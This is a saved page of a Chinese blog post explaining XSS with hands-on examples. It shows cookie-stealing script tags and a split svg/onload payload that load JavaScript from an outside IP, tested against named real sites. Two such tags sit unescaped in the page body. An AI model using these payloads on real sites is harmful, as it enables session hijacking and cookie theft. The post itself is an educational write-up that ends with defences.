<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="websec-xss," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />







<meta name="description" content="** 白帽巫师MR.Poter">
<meta property="og:type" content="article">
<meta property="og:title" content="web安全之xss简单小计">
<meta property="og:url" content="https://shawnleon.github.io/2016/08/12/websec-xss/index.html">
<meta property="og:site_name" content="THE WEAK ARE HARD TO GET THE FAIR">
<meta property="og:description" content="** 白帽巫师MR.Poter">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/hp.jpg">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/websecxss.jpg">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/xss.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/10.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/11.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/12.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/13.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/14.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/16.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/17.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/18.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/19.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/20.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/1.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/2.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/3.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/4.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/5.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/6.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/7.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/21.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/22.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/23.png">
<meta property="og:image" content="https://shawnleon.github.io/images/websec-xss/xssd.png">
<meta property="og:updated_time" content="2016-08-26T14:44:38.186Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="web安全之xss简单小计">
<meta name="twitter:description" content="** 白帽巫师MR.Poter">
<meta name="twitter:image" content="https://shawnleon.github.io/images/websec-xss/hp.jpg">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"always"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="https://shawnleon.github.io/2016/08/12/websec-xss/"/>

  <title> web安全之xss简单小计 | THE WEAK ARE HARD TO GET THE FAIR </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta custom-logo">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">THE WEAK ARE HARD TO GET THE FAIR</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">THE ONLY FAIR IS NOT FAIR</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-board">
          <a href="/board" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />
            
            留言板
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', 'ueXsZP8kWT66wb-z9nvw','2.0.0');
</script>



    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                web安全之xss简单小计
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-08-12T23:20:00+08:00" content="2016-08-12">
              2016-08-12
            </time>
          </span>

          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/08/12/websec-xss/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/08/12/websec-xss/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
              &nbsp; | &nbsp;
              <span class="page-pv"><i class="fa fa-file-o"></i>
              <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
              </span>
          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><img src="/images/websec-xss/hp.jpg" alt="image"><br>** 白帽巫师MR.Poter<br><a id="more"></a><br><img src="/images/websec-xss/websecxss.jpg" alt="image"></p>
<h2 id="白帽巫师都是报团成长的。主心骨，团结，无畏的精神缺一不可。"><a href="#白帽巫师都是报团成长的。主心骨，团结，无畏的精神缺一不可。" class="headerlink" title="** 白帽巫师都是报团成长的。主心骨，团结，无畏的精神缺一不可。"></a>** 白帽巫师都是报团成长的。主心骨，团结，无畏的精神缺一不可。</h2><h1 id="0x00-什么是xss？危害？"><a href="#0x00-什么是xss？危害？" class="headerlink" title="0x00 什么是xss？危害？"></a>0x00 什么是xss？危害？</h1><hr>
<h2 id="什么是xss？"><a href="#什么是xss？" class="headerlink" title="什么是xss？"></a>什么是xss？</h2><p>跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击盗取用户cookie和session，、破坏页面结构、重定向到其它网站等。<br>跨站脚本重要的是脚本，跨站是浏览器的特性，不是缺陷。造成这样的假象是因为大多说的XSS攻击都采用嵌入远程或者第三方域的脚本资源。这样的脚本主要有javascript和actionscript。<br>xss这类攻击是浏览器来解析执行的，浏览器会严格按照同源策略解析，不符合约定的不会执行。</p>
<h2 id="xss的危害有多大？"><a href="#xss的危害有多大？" class="headerlink" title="xss的危害有多大？"></a>xss的危害有多大？</h2><p>真正的xss攻击不是简单的弹个测试的框，而是诸如<br><code>&lt;script src=“http://xxx/x.js”&gt;&lt;/script&gt;</code> 的js代码。<br>危害是由行为决定的，在各大漏洞平台总结的XSS可能造成的行为及危害有</p>
<blockquote>
<ul>
<li>网络钓鱼，包括盗取各类用户账号</li>
<li>窃取用户cookie，从而利用身份进一步对网站操作</li>
<li>劫持用户浏览器会话，从而执行任意操作，诸如非法转账，发表日志，发送email等</li>
<li>强制弹广告，刷流量，影响网站声誉。</li>
<li>网页挂马，会影响搜索引擎的排名，也可能泄露网站数据，网站被篡改的面目全非</li>
<li>进行大量的客户端攻击，DDOS之类</li>
<li>结合其他csrf漏洞等，进行其他的不良行为</li>
<li>提升用户权限，进一步渗透网站</li>
<li>传播跨站脚本蠕虫</li>
</ul>
</blockquote>
<hr>
<h1 id="0x01-xss的分类"><a href="#0x01-xss的分类" class="headerlink" title="0x01 xss的分类"></a>0x01 xss的分类</h1><hr>
<p>xss可以分为这几类</p>
<blockquote>
<ul>
<li>反射型xss </li>
<li>储存型xss</li>
<li>DOM XSS</li>
<li>flash xss</li>
<li>m XSS</li>
</ul>
</blockquote>
<h2 id="1-反射（非持久）型xss攻击"><a href="#1-反射（非持久）型xss攻击" class="headerlink" title="1.反射（非持久）型xss攻击"></a>1.反射（非持久）型xss攻击</h2><p>非持久型xss攻击是一次性的，仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接，用户访问该链接时，被植入的攻击脚本被用户游览器执行，从而达到攻击目的。<br><img src="/images/websec-xss/xss.png" alt="image"></p>
<h2 id="2-储存（持久）型xss攻击"><a href="#2-储存（持久）型xss攻击" class="headerlink" title="2.储存（持久）型xss攻击"></a>2.储存（持久）型xss攻击</h2><p>持久型xss攻击会把攻击者的数据存储在服务器端，攻击行为将伴随着攻击数据一直存在。如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie等</p>
<h2 id="其他XSS暂时未接触"><a href="#其他XSS暂时未接触" class="headerlink" title="其他XSS暂时未接触"></a>其他XSS暂时未接触</h2><hr>
<h1 id="0x02-实例"><a href="#0x02-实例" class="headerlink" title="0x02 实例"></a>0x02 实例</h1><hr>
<h2 id="反射型xss"><a href="#反射型xss" class="headerlink" title="反射型xss"></a>反射型xss</h2><h3 id="某赴美生子"><a href="#某赴美生子" class="headerlink" title="某赴美生子"></a>某赴美生子</h3><p>说实话，我也想子女是外国的。欧洲瑞士瑞典乌克兰那边挺好。<br>因为写日记得经过2D审核，毕竟这个网站是赚钱的，不能让咱们随便发日志文件。所以我只 用搜索框得到自己的饼干（cookie）。</p>
<p>验证了xss的弹窗<br><img src="/images/websec-xss/10.png" alt="image"><br>，于是我换成获取饼干的js代码”/&gt;<script src="http://115.159.126.186/x.js"></script>  并在源码中插入有效成功<br><img src="/images/websec-xss/11.png" alt="image"><br>成功看到连个url请求说明可以获取饼干<br><img src="/images/websec-xss/12.png" alt="image"><br><img src="/images/websec-xss/13.png" alt="image"><br>然后我再次输入”/&gt;<script src="http://115.159.126.186/x.js"></script><br>在我外网地址获取到自己饼干<br><img src="/images/websec-xss/14.png" alt="image"></p>
<h3 id="人物周刊"><a href="#人物周刊" class="headerlink" title="人物周刊"></a>人物周刊</h3><p>个人主页</p>
<p><img src="/images/websec-xss/16.png" alt="image"><br>用户名可以显示，我们找到了输出点，测试下：”&lt;&gt;/<br>发现用户名直接在P标签里面<br><img src="/images/websec-xss/17.png" alt="image"><br>所以我们直接插入弹窗代码试试<br>可以弹窗<br><img src="/images/websec-xss/18.png" alt="image"><br>不用抓包，直接插入就加载了JS代码<br><img src="/images/websec-xss/19.png" alt="image"><br>然后把获取饼干（cookie）的js代码加入查看源码发现只显示26个字符<br><img src="/images/websec-xss/20.png" alt="image"><br>所以要在26个字符内写入自己外网JS 如何缩短代码是个问题。然后就放弃了，毕竟只是测试。</p>
<h2 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h2><h3 id="某手机论坛"><a href="#某手机论坛" class="headerlink" title="某手机论坛"></a>某手机论坛</h3><p>** 尝试发帖验证是否字符实体化。<br><img src="/images/websec-xss/1.png" alt="image"></p>
<p><strong> 查看源码发现<br><img src="/images/websec-xss/2.png" alt="image">
</strong> 尝试抓包修改并放行<br>代码：<br><code>&lt;/div&gt;&lt;script&gt;alert(0)&lt;/script&gt;</code>    <code>//因为在div标签里面所以得闭合标签,没引用前面这段代码，本地测试弹窗了。。</code><br><img src="/images/websec-xss/3.png" alt="image"><br><strong> 就看到了弹窗<br><img src="/images/websec-xss/4.png" alt="image">
</strong> 在弹窗之后我尝试回帖抓包插入获取饼干代码只有一个js的url请求不知道为什么<br><img src="/images/websec-xss/5.png" alt="image"></p>
<p>** 没有php的url请求就无法实现获取饼干(cookie)。</p>
<p><strong> 在改写了js文件后，有了php请求<br><img src="/images/websec-xss/6.png" alt="image">
</strong> 然后重新进入帖子，获取到自己的饼干,在自己外网查看获取到的饼干。<br><img src="/images/websec-xss/7.png" alt="image"><br>** 只做测试，未尝试其他，把自己帖子删除了。不知道过去那么长时间修复了没有。</p>
<h3 id="某电影网"><a href="#某电影网" class="headerlink" title="某电影网"></a>某电影网</h3><p>在可关注话题处，在验证了弹窗之后，由于只有30字符输入限制，所以</p>
<p>重新构造payload<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">&lt;svg/onload=&quot;b=&apos;http://123&apos;&quot;&gt;</div><div class="line">&lt;svg/onload=&quot;b+=&apos;.123.&apos;&quot;&gt;</div><div class="line">&lt;svg/onload=&quot;b+=&apos;126.186&apos;&quot;&gt;</div><div class="line">&lt;svg/onload=&quot;b+=&apos;/xx.js&apos;&quot;&gt;</div><div class="line">&lt;svg/onload=&quot;$loadJs(b)&quot;&gt;</div></pre></td></tr></table></figure></p>
<p>之后就成功请求.js  .php<br><img src="/images/websec-xss/21.png" alt="image"><br><img src="/images/websec-xss/22.png" alt="image"><br>刷新时光网之后的时间是我服务器的时间，右下角是我电脑的时间。<br><img src="/images/websec-xss/23.png" alt="image"></p>
<p>如果某个很厉害的玩家，嗯，被关注度很高，然后能打到好多cookie啊。</p>
<hr>
<h2 id="0x04-防御"><a href="#0x04-防御" class="headerlink" title="0x04 防御"></a>0x04 防御</h2><hr>
<p>几乎每篇谈论 XSS 的文章，结尾多少都会提到如何防止，然而大多万变不离其宗。要转义什么，要过滤什么，不要忘了什么之类的。尽管都是众所周知的道理，但 XSS 漏洞十几年来几乎从未中断过，不乏一些大网站也时常爆出，小网站更是家常便饭。<br>而本文介绍的则是另一种预防思路 —— 通过前端监控脚本，让每一个用户都参与漏洞的监控和上报。<br>详情可见源博客<a href="http://fex.baidu.com/blog/2014/06/xss-frontend-firewall-1/" target="_blank" rel="external">XSS 前端防火墙 —— 内联事件拦截</a></p>
<p>freebuf也有篇借上述博客谈的 <a href="http://www.freebuf.com/articles/web/110583.html" target="_blank" rel="external">前端xss报警</a><br><img src="/images/websec-xss/xssd.png" alt="image"></p>
<p><strong>题外话：如果你对本站文章字体有任何不适，请告知我，我会回复你，字体问题请配置浏览器，调到对眼睛舒适的大小;默认不允许转载，除非转载注明出处。</strong></p>
<p>end</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/websec-xss/" rel="tag">#websec-xss</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/08/09/domain/" rel="next" title="申请绑定免费域名">
                <i class="fa fa-chevron-left"></i> 申请绑定免费域名
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/08/15/websec-passwd-recovery/" rel="prev" title="密码找回逻辑漏洞">
                密码找回逻辑漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <div class="ds-share flat" data-thread-key="2016/08/12/websec-xss/"
     data-title="web安全之xss简单小计"
     data-content=""
     data-url="https://shawnleon.github.io/2016/08/12/websec-xss/">
  <div class="ds-share-inline">
    <ul  class="ds-share-icons-16">

      <li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
      <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
      <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
      <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
      <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>

    </ul>
    <div class="ds-share-icons-more">
    </div>
  </div>
</div>
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/08/12/websec-xss/"
           data-title="web安全之xss简单小计" data-url="https://shawnleon.github.io/2016/08/12/websec-xss/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/1.jpg"
               alt="shawnleon" />
          <p class="site-author-name" itemprop="name">shawnleon</p>
          <p class="site-description motion-element" itemprop="description">People always like the person who are willing to trust them.</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">12</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/shawnleon" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/copercheung" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.weibo.com/3691383884/profile?rightmod=1&wvr=6&mod=personinfo" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://www.facebook.com/profile.php?id=100009656739973" target="_blank" title="facebook">
                  
                    <i class="fa fa-fw fa-facebook"></i>
                  
                  facebook
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links/友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://shitoudaren.github.io/" title="shit欧建磊" target="_blank">shit欧建磊</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://leelie.github.io" title="伟伟leelie" target="_blank">伟伟leelie</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://lovexiaofeng.cn/" title="call me小峰" target="_blank">call me小峰</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://scorpoin.github.io" title="大棟の哥" target="_blank">大棟の哥</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://nouername.github.io" title="帅乔飞" target="_blank">帅乔飞</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://zhmy1228.github.io" title="moon明明如月" target="_blank">moon明明如月</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://liulangdelmao.github.io/" title="卓卓" target="_blank">卓卓</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.ctqt.ml/" title="春天的春，晴天的晴" target="_blank">春天的春，晴天的晴</a>
                </li>
              
            </ul>
          </div>
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#白帽巫师都是报团成长的。主心骨，团结，无畏的精神缺一不可。"><span class="nav-number">1.</span> <span class="nav-text">** 白帽巫师都是报团成长的。主心骨，团结，无畏的精神缺一不可。</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-什么是xss？危害？"><span class="nav-number"></span> <span class="nav-text">0x00 什么是xss？危害？</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#什么是xss？"><span class="nav-number">1.</span> <span class="nav-text">什么是xss？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xss的危害有多大？"><span class="nav-number">2.</span> <span class="nav-text">xss的危害有多大？</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-xss的分类"><span class="nav-number"></span> <span class="nav-text">0x01 xss的分类</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-反射（非持久）型xss攻击"><span class="nav-number">1.</span> <span class="nav-text">1.反射（非持久）型xss攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-储存（持久）型xss攻击"><span class="nav-number">2.</span> <span class="nav-text">2.储存（持久）型xss攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#其他XSS暂时未接触"><span class="nav-number">3.</span> <span class="nav-text">其他XSS暂时未接触</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-实例"><span class="nav-number"></span> <span class="nav-text">0x02 实例</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#反射型xss"><span class="nav-number">1.</span> <span class="nav-text">反射型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#某赴美生子"><span class="nav-number">1.1.</span> <span class="nav-text">某赴美生子</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#人物周刊"><span class="nav-number">1.2.</span> <span class="nav-text">人物周刊</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#存储型XSS"><span class="nav-number">2.</span> <span class="nav-text">存储型XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#某手机论坛"><span class="nav-number">2.1.</span> <span class="nav-text">某手机论坛</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#某电影网"><span class="nav-number">2.2.</span> <span class="nav-text">某电影网</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-防御"><span class="nav-number">3.</span> <span class="nav-text">0x04 防御</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">shawnleon</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

<div class="busuanzi-count">

  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv"><i class="fa fa-user"></i><span class="busuanzi-value" id="busuanzi_value_site_uv"></span></span>
  

  
    <span class="site-pv"><i class="fa fa-eye"></i><span class="busuanzi-value" id="busuanzi_value_site_pv"></span></span>
  
  
</div>



        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"shawnleon"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
       search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();

    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
    'use strict';
    $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
            // get the contents from search data
            isfetched = true;
            $('.popup').detach().appendTo('.header-inner');
            var datas = $( "entry", xmlResponse ).map(function() {
                return {
                    title: $( "title", this ).text(),
                    content: $("content",this).text(),
                    url: $( "url" , this).text()
                };
            }).get();
            var $input = document.getElementById(search_id);
            var $resultContent = document.getElementById(content_id);
            $input.addEventListener('input', function(){
                var matchcounts = 0;
                var str='<ul class=\"search-result-list\">';
                var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                $resultContent.innerHTML = "";
                if (this.value.trim().length > 1) {
                // perform local searching
                datas.forEach(function(data) {
                    var isMatch = true;
                    var content_index = [];
                    var data_title = data.title.trim().toLowerCase();
                    var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                    var data_url = data.url;
                    var index_title = -1;
                    var index_content = -1;
                    var first_occur = -1;
                    // only match artiles with not empty titles and contents
                    if(data_title != '' && data_content != '') {
                        keywords.forEach(function(keyword, i) {
                            index_title = data_title.indexOf(keyword);
                            index_content = data_content.indexOf(keyword);
                            if( index_title < 0 && index_content < 0 ){
                                isMatch = false;
                            } else {
                                if (index_content < 0) {
                                    index_content = 0;
                                }
                                if (i == 0) {
                                    first_occur = index_content;
                                }
                            }
                        });
                    }
                    // show search results
                    if (isMatch) {
                        matchcounts += 1;
                        str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                        var content = data.content.trim().replace(/<[^>]+>/g,"");
                        if (first_occur >= 0) {
                            // cut out 100 characters
                            var start = first_occur - 20;
                            var end = first_occur + 80;
                            if(start < 0){
                                start = 0;
                            }
                            if(start == 0){
                                end = 50;
                            }
                            if(end > content.length){
                                end = content.length;
                            }
                            var match_content = content.substring(start, end);
                            // highlight all keywords
                            keywords.forEach(function(keyword){
                                var regS = new RegExp(keyword, "gi");
                                match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                            });

                            str += "<p class=\"search-result\">" + match_content +"...</p>"
                        }
                        str += "</li>";
                    }
                })};
